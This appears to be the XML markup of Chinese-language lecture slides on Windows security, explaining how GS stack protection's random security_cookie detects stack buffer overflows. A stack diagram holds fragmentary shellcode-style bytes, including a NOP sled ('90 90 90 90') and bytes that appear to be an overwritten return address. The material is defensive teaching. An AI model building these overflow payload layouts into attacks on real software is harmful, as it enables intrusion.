                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{519D97D2-0BF8-FBD7-9E46-1AEAA49B3C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501604" y="306653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0EA6EB33-BE1B-AF61-99AE-A9FF1CFCC450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512875" y="3077604"/>
            <a:ext cx="1428888" cy="349796"/>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78" name="直线连接符 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197B6A08-EE33-2FF2-B005-29F54BD661C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="342740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01A87C5-EEDE-C203-D471-ABAF20FAD1FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="3441960"/>
            <a:ext cx="1428889" cy="378573"/>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0" name="直线连接符 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2746EF27-64C7-D1A7-0B84-6A7A490C7CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="382053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859F2DC0-AF8A-A80C-5FEA-FC252C58B702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4380829" y="2727980"/>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2" name="直线箭头连接符 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE5E96E7-7195-6EB2-BE88-41D52BD4FDB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4112907" y="2888632"/>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5E46C7A5-E61E-4D64-444E-C90C14D5FA52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4445822" y="5529176"/>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4" name="直线箭头连接符 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43923F9B-CEDD-94A5-B7D8-BC50CDBDE765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4131959" y="5698453"/>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连接符 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2BFFD8C-28B9-9A6D-4D7F-23C901F9C67F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501606" y="423830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212BB9C9-0517-4787-8158-96C9EFE1845D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="3835033"/>
            <a:ext cx="1428891" cy="394649"/>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87" name="文本框 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5834B68A-4566-B098-4234-2FA4DB6E2D5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="4251512"/>
            <a:ext cx="1428889" cy="377929"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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74 73 65 77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8" name="直线连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A4F9D59-08C8-AB04-8A61-312A56D380ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="463807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C724BB87-E2BC-875F-30B5-752DCAED66D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512875" y="4652749"/>
            <a:ext cx="1428888" cy="401043"/>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68 53 DB 33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90" name="直线连接符 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5EA1836-A808-BA4D-7567-9DA08B6C4D11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501603" y="506242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91" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6F8853F-ADBF-D21F-4257-A0FDCCD9EE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501606" y="232914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8110CB3C-C4A2-4182-AAE7-2FB1E1C1BF7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501603" y="1950497"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="93" name="肘形连接符 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A410D78D-BDE2-1EBB-8690-4F7E4110BC35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1120221" y="3511739"/>
            <a:ext cx="2376264" cy="386507"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99933"/>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连接符 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{438C1A8C-C994-B9E7-0CA4-1B4F09931103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2115099" y="2521474"/>
            <a:ext cx="409579"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14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4" grpId="0"/>
      <p:bldP spid="41" grpId="0" animBg="1"/>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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全防护</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384032" y="1150876"/>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思路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487DA4E5-B82C-2059-9460-F6BA998A17BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1704504"/>
            <a:ext cx="4968552" cy="4289059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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security_cookie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在进程启动时会随机产生，并且它的原始存储地址因</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操作系统</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ASLR</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机制也是随机存放的，攻击者无法对</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security_cookie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进行篡改。</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当发生栈缓冲区溢出攻击时，对返回地址或其他指针的进行覆盖的同时，也会覆盖</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security_cookie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的值。因此，在函数调用结束返回时，对</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security_cookie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进行检查就会发现它的值变化了，从而发现缓冲区溢出，中断当前进程并报错。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9ED5CF-6E89-FB13-8F76-76856FFA7C41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="858220" y="1125339"/>
            <a:ext cx="445987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思考：如何防止</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执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="矩形 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4157A527-8EC6-7A77-7129-91AC472515D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166393" y="3226981"/>
            <a:ext cx="1560988" cy="37544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文本框 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F08E8FE-D6F0-729B-F694-3CA08B2B003B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143469" y="3247051"/>
            <a:ext cx="1675459"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security cookie</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6" name="直接连接符 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96E75B8-85B8-DD63-0E06-AF13C73D0C68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3948170" y="3236369"/>
            <a:ext cx="229302" cy="12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A09250C4-CC8F-64EA-DA61-8998697ACA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3938657" y="3242816"/>
            <a:ext cx="224720" cy="35961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D0481EC6-AD13-8570-425D-16D0BCF02A70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501606" y="1954651"/>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文本框 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF052DC8-A568-0DE5-EBFB-A026EE791722}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484007" y="197402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72" name="文本框 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3369620-EA73-6F9E-E1D8-A551EE816EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1487488" y="5506194"/>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73" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253E9DDD-3B85-E129-7508-F56A1DD3D284}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="26986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FCC13C3-41ED-2EC5-C4AB-B4723B24E834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512875" y="2329146"/>
            <a:ext cx="1428888" cy="375428"/>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00 12 FA F0</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="文本框 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A8DD6B-D1A7-9979-43C1-7FED9503B5F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="2712118"/>
            <a:ext cx="1428891" cy="345791"/>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76" name="直线连接符 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{519D97D2-0BF8-FBD7-9E46-1AEAA49B3C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501604" y="306653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0EA6EB33-BE1B-AF61-99AE-A9FF1CFCC450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512875" y="3077604"/>
            <a:ext cx="1428888" cy="349796"/>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78" name="直线连接符 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197B6A08-EE33-2FF2-B005-29F54BD661C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="342740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501A87C5-EEDE-C203-D471-ABAF20FAD1FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="3441960"/>
            <a:ext cx="1428889" cy="378573"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>90 90 90 90</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0" name="直线连接符 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2746EF27-64C7-D1A7-0B84-6A7A490C7CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="382053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859F2DC0-AF8A-A80C-5FEA-FC252C58B702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4380829" y="2727980"/>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2" name="直线箭头连接符 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE5E96E7-7195-6EB2-BE88-41D52BD4FDB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4112907" y="2888632"/>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5E46C7A5-E61E-4D64-444E-C90C14D5FA52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4445822" y="5529176"/>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4" name="直线箭头连接符 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43923F9B-CEDD-94A5-B7D8-BC50CDBDE765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4131959" y="5698453"/>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连接符 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2BFFD8C-28B9-9A6D-4D7F-23C901F9C67F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501606" y="423830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212BB9C9-0517-4787-8158-96C9EFE1845D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="3835033"/>
            <a:ext cx="1428891" cy="394649"/>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87" name="文本框 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5834B68A-4566-B098-4234-2FA4DB6E2D5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="4251512"/>
            <a:ext cx="1428889" cy="377929"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en"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74 73 65 77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8" name="直线连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A4F9D59-08C8-AB04-8A61-312A56D380ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512874" y="463807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C724BB87-E2BC-875F-30B5-752DCAED66D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512875" y="4652749"/>
            <a:ext cx="1428888" cy="401043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>68 53 DB 33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90" name="直线连接符 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5EA1836-A808-BA4D-7567-9DA08B6C4D11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501603" y="506242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91" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6F8853F-ADBF-D21F-4257-A0FDCCD9EE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501606" y="232914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8110CB3C-C4A2-4182-AAE7-2FB1E1C1BF7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501603" y="1950497"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="93" name="肘形连接符 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A410D78D-BDE2-1EBB-8690-4F7E4110BC35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1120221" y="3511739"/>
            <a:ext cx="2376264" cy="386507"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99933"/>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连接符 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{438C1A8C-C994-B9E7-0CA4-1B4F09931103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2115099" y="2521474"/>
            <a:ext cx="409579"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553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 altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>GS stack protection</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14E57EF5-43E1-1F3C-3521-4EC33530EB1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792086" y="691952"/>
            <a:ext cx="8607828" cy="5894491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3299292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GS stack protection</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2" y="1052513"/>
            <a:ext cx="10603509"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3" name="图片 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04D6F9B1-0412-387F-8253-4321421105ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858220" y="2295236"/>
            <a:ext cx="6172517" cy="2717940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="图片 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D27AE4B-FC8A-D83F-8460-30C04A22A38B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8184232" y="2753471"/>
            <a:ext cx="2768742" cy="1854295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
